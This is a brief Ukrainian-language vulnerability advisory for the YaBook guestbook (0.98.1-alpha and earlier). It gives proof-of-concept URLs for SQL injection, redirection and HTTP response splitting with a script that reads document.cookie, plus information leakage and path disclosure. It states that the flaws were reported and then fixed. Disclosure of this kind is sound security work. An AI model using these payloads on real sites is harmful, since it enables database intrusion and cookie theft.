Уразливості в YaBook
20:04 16.05.200921.01.2009
В лютому, 17.02.2008, я знайшов SQL Injection, Redirector, HTTP Response Splitting та Information Leakage уразливості, а сьогодні ще й Full path disclosure в YaBook. Це гостьова книга. Дірки виявив на сайті розробника YaBook. Про що найближчим часом повідомлю розробнику веб додатку.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробнику додатку.
16.05.2009
SQL Injection:
http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20version()
Redirector (через SQL Injection):
http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'http://websecurity.com.ua'
HTTP Response Splitting (через SQL Injection):
http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E'
Працює на старих версіях PHP.
Information Leakage:
http://site/guestbook/index.php
В meta-тегах виводиться інформація про версію PHP, MySQL і веб сервера.
Full path disclosure:
http://site/guestbook/config.inc.php
Full path disclosure (через SQL Injection):
http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'%0A1'
Уразлива версія YaBook 0.98.1-alpha та попередні версії.
В версії YaBook 0.98.2-alpha автор виправив дані уразливості.